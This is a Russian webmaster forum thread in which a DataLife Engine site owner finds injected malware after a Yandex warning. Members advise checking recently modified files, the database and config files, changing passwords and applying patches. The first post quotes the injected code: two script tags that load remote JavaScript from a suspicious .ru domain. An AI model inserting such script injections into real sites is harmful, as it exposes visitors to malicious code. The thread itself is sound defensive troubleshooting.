Посторонний скрипт в DLE
Страницы: 1
Посторонний скрипт в DLE
Здравствуйте!
Вот увидел в Яндекс Вебмастере что на сайте обнаружен вредоносный код, так вот зашёл на свой сайт и действительно он там оказался.

Код
<script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/b93a29e4fa41e0c27d1d89fc94ec24b6.js?in">
</script><script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/896c62ef496dc5a210eb846c4ef4c5d8.js?in"></script>


Где можно его поискать? Вылазит он в краткой новости и в полной новости, после текста. Изменения явно в файлах движка, но вот отыскать его не удалось. Может кто посоветует... Заранее благодарен!
p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.
ищите по фтп или как удобно (через хостера) файлы с недавней датой изменения.
также помогает поиск строки кода, в частности http://bhq6bim
часто делают инекцию в каталоги \engine\modules или \ engine\inc 
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
очень может, надо искать дырку и латать
Цитата
killer1000 пишет:
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
Где нашел? У меня такая же гадость появилась. Ничего не нахожу ни в файлах движка, ни в базе..
сперва пароль от фтп смените... а потом разбирайтесь со скриптами
проблема явно в .js
Это шеллы, их вливают через уязвимости в ДЛЕ. Советую обратиться к автору этого топика: www.cy-pr.com/forum/f80/t55113/
Если код в статье, то это в БД. При наличии свежей версии достаточно сделать перестроение публикаций в админке и из новостей код удалится. так же надо проверить файлы, в которых может быть вредоносный код:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Обязательно сменить все пароли (к БД, фтп, админка) и установить патчи безопасность в зависимости от версии скрипта, с оффсайта. Если стоит нулл, менять на "чистую" версию скрипта.
Цитата
ориться зан
>p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.Причем тут эти файлы? Если получили доступ к бд значит дырка на хостинге, а туда могли попасть через взлом фтп. 
Закрыть дырки надо, на оф. сайте заплатки лежат, была такая же херня, доступ был получен из кеша базы, что-то в этом роде.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
18:44 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
13:43 Стоит ли добавлять сайт в Rambler топ 100? 
13:12 Покупные ссылки 
12:57 Rotapost прикрыли! Чем пользоваться? 
15:12 Ночной бар в Паттайе: как случайная встреча с "тайкой" и её кадыком перевернула мой взгляд на продвижение сайта в Google 2026 
15:01 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
07:24 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
23:37 Продажа горячих лидов и готовых баз для финансовых проектов, брокеров и чарджбэк-компаний. 
22:59 SnapSwap.io — мгновенный обмен BTC, XMR, ETH, USDT и других криптовалют без регистрации! 
21:50 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
14:47 CryptoMonitor.info - ваш надеждный обменник BTC USDT XMR (без KYC) 
12:40 Mixmasters - Exchange without AML and KYC 
11:11 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
10:44 PonyBit.ru - обменный пункт PonyBit.ru (Понибит.ру) 
22:59 Про мясо 
15:07 Добро пожаловать в цифровой мир... 
22:12 BYTIK.shop – сервис по продвижению в популярных социальных сетях​ 
10:10 накрутка трафика в SimilarWeb 
16:50 Компьютерная мышь 
22:11 С юмором по жизни! 
23:03 Точные прогнозы на футбол